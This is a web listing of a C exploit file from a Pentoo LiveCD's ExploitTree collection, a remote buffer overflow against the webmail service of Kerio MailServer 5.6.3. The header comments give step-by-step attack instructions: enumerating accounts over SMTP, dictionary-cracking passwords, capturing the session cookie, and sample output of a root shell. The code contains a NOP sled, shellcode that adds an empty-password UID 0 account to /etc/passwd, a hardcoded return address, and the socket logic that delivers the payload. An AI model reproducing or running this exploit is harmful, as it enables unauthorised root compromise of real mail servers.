home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / kerio / keriobaby.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  6.4 KB  |  209 lines
  1. /* Remote Buffer Overflow Exploit for Kerio MailServer 5.6.3 */
  2. /* ========================================================= */
  3. /*        By B-r00t <br00t@blueyonder.co.uk          */
  4. /*                                 */
  5. /* In response to the Kerio Mailserver vulnerabilities       */
  6. /* discovered by David F.Madrid.                 */
  7. /* http://nautopia.org/vulnerabilidades/kerio_mailserver.htm */
  8. /*                                                         */
  9. /* Although this exploit requires valid authentication         */
  10. /* details, it is possible to use 'RCPT TO' to enumerate     */
  11. /* valid accounts 'A La Sendmail' as shown below: -         */
  12. /*
  13.  
  14. $ telnet 192.168.0.10 25
  15. Trying 192.168.0.10...
  16. Connected to 192.168.0.10.
  17. Escape character is '^]'.
  18. 220 dhcp-185-45 Kerio MailServer 5.6.3 ESMTP ready
  19. mail from: Br00t@scriptkiddie.net
  20. 250 2.1.0 Sender <Br00t@scriptkiddie.net> ok
  21.  
  22. rcpt to: nosuchuser@scriptkiddie.net
  23. 550 5.1.1 Mailbox <nosuchuser@scriptkiddie.net> does not exist
  24. rcpt to:admin@scriptkiddie.net
  25. 250 2.1.5 Recipient <admin@scriptkiddie.net> ok (local) << default admin account.
  26. rcpt to: fred@scriptkiddie.net
  27. 250 2.1.5 Recipient <fred@scriptkiddie.net> ok (local) << user fred seems to exist.
  28.  
  29. rset
  30. 250 2.0.0 Reset state
  31. quit
  32. 221 2.0.0 SMTP closing connection
  33. Connection closed by foreign host.
  34.  
  35. */
  36. /* Using a dictionary attack to obtain a large number   */
  37. /* of accounts in conjunction with users  natural     */
  38. /* stupidity for using easy to guess passwords should    */
  39. /* yield at least one valid account.            */
  40. /*                            */
  41. /* Once an account has been cracked, login to the    */
  42. /* Kerio webmail service and record the 'userid'     */
  43. /* cookie value: -                    */
  44. /*
  45. $ lynx 192.168.0.10
  46.    Username: fred___________
  47.    Password: _______________
  48.    OK
  49.  
  50.  
  51. 192.168.0.10 cookie: userid=7dc1700017e708a5  Allow? (Y/N/Always/neVer)
  52. */
  53. /* Accept the cookie 'Y' to ensure you are fully    */
  54. /* logged in to the Kerio webmail service.        */
  55. /*
  56.  
  57. [br00t@silvia:~] $ ./keriobaby 192.168.0.10 userid=7dc1700017e708a5
  58.  
  59. Payload: 408 / 408 bytes
  60.  
  61.  
  62. Wall0p! ... !!!
  63.  
  64.  
  65. If successful a UID 0 Account 'keriohacker'
  66. has been appended to /etc/passwd. Use 'ssh'
  67. or 'su' (if local) to get r00t! ....
  68.  
  69. [br00t@silvia:~] $ ssh -l keriohacker 192.168.0.10
  70. Last login: Thu Jun  5 08:21:30 2003
  71.  
  72. sh-2.05# id
  73. uid=0(root) gid=0(root) groups=0(root)
  74. sh-2.05# tail -1 /etc/passwd
  75. keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
  76. sh-2.05#
  77.  
  78. *SSH assumes: PermitRootLogin yes & PermitEmptyPasswords yes
  79. Alternative: Recode the shellcode to add normal user!
  80. That's All Folks ...
  81. ENJOY!
  82. */
  83.  
  84.  
  85. #include <stdlib.h>
  86. #include <stdio.h>
  87. #include <string.h>
  88. #include <sys/types.h>
  89. #include <sys/socket.h>
  90. #include <netinet/in.h>
  91. #include <arpa/inet.h>
  92.  
  93. #define DEST_PORT 80
  94.  
  95. int main ( int argc, char *argv[] )
  96. {
  97. int socketfd, bytes;
  98. struct sockaddr_in dest_addr;
  99.  
  100. char buffer[700];
  101. // char ret[] = "\x07\xf7\x7f\xbe"; // Use this if attached with GDB
  102. char ret[] = "\x07\xf7\xff\xbe"; // RedHat Linux 7.2 + kerio-mailserver-mcafee-5.6.3-rh7.i386.rpm
  103. char *ptr = buffer;
  104. char req[] = "GET /list?folder=~";
  105. char cr[] = "\x0D\x0A";
  106.  
  107. char shellcode[] =
  108. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  109. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  110. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  111. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  112. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  113. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  114. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  115. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  116. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  117. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  118. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  119. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  120. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  121. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  122. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  123. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  124. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  125. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  126. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  127. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  128. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  129. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  130. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  131. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  132. // Fat Bloke Shellcode to avoid HTTP chars by B-r00t..
  133. // Appends: keriohacker::0:0:B-r00t~R0x~Y3r~W0rld!.:/tmp:/bin/sh
  134. "\xeb\x55\x5e\xb0\xff\x2c\xd0\x88\x06\x88\x46\x04\x88\x46\x34"
  135. "\x88\x46\x39\x88\x46\x3d\x31\xc0\x88\x46\x0b\x88\x46\x41\x66"
  136. "\xb8\x0b\x27\x66\x2d\x01\x27\x66\x89\x46\x40\x8d\x5e\x0c\x89"
  137. "\x5e\x42\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd"
  138. "\x80\x89\xc3\xb0\x04\x8b\x4e\x42\x31\xd2\xb2\xff\x80\xea\xca"
  139. "\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xa6\xff"
  140. "\xff\xff\x58\x65\x74\x63\x58\x70\x61\x73\x73\x77\x64\x58\x6b"
  141. "\x65\x72\x69\x6f\x68\x61\x63\x6b\x65\x72\x3a\x3a\x30\x3a\x30"
  142. "\x3a\x42\x2d\x72\x30\x30\x74\x7e\x52\x30\x78\x7e\x59\x33\x72"
  143. "\x7e\x57\x30\x72\x6c\x64\x21\x2e\x3a\x58\x74\x6d\x70\x3a\x58"
  144. "\x62\x69\x6e\x58\x73\x68\x58\x58\x41\x41\x41\x41"
  145. "\x90\x90\x90\x90\x90\x90";
  146.  
  147. memset (buffer, '\0', sizeof (buffer));
  148.  
  149. if (argc < 3) {
  150.         printf("\nUsage: %s [IP_ADDRESS] [COOKIE]", argv[0]);
  151.         printf("\nExample: %s 10.0.0.1 userid=771c740df0270936\n", argv[0]);
  152.     exit (1);
  153.         }
  154.  
  155. printf ("\nPayload: %d / 408 bytes\n\n", strlen(shellcode));
  156.  
  157. strcpy (buffer, req);
  158. strcat (buffer, shellcode);
  159. strcat (buffer, ret);
  160. strcat (buffer, ret);
  161. strcat (buffer, " HTTP/1.0");
  162. strcat (buffer, cr);
  163. strcat (buffer, "Cookie: ");
  164. strcat (buffer, argv[2]);
  165. strcat (buffer, cr);
  166. strcat (buffer, cr);
  167.  
  168. if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  169.         perror("Socket");
  170.         exit (1);
  171.         }
  172.  
  173. dest_addr.sin_family = AF_INET;
  174. dest_addr.sin_port = htons(DEST_PORT);
  175. if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
  176.         perror("inet_aton problems");
  177.         exit (2);
  178.         }
  179.  
  180. memset( &(dest_addr.sin_zero), '\0', 8);
  181.  
  182. if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
  183.         perror("connect failed");
  184.         close (socketfd);
  185.         exit (3);
  186.         }
  187.  
  188.  
  189. bytes = (send (socketfd, ptr, strlen(buffer), 0));
  190. if (bytes == -1) {
  191.         perror("send error");
  192.         close (socketfd);
  193.         exit(4);
  194.         }
  195.  
  196. close (socketfd);
  197. printf ("\nWall0p! ... !!!\n\n");
  198. printf ("\nIf successful a UID 0 Account 'keriohacker'");
  199. printf ("\nhas been appended to /etc/passwd. Use 'ssh'");
  200. printf ("\nor 'su' (if local) to get r00t! ....\n\n");
  201.  
  202. }
  203.  
  204. /* Shoutz: Marshal-l, Rux0r, macavity, Monkfish, Mum & Dad.    */
  205. /* B-r00t aka B#. 2003. <br00t@blueyonder.co.uk>        */
  206. /* "If You Can't B-r00t Then Just B#."                */
  207. /* That One Doris ... U-Know-Who-U-R!                */
  208. /* THE END - AMEN.                        */
  209.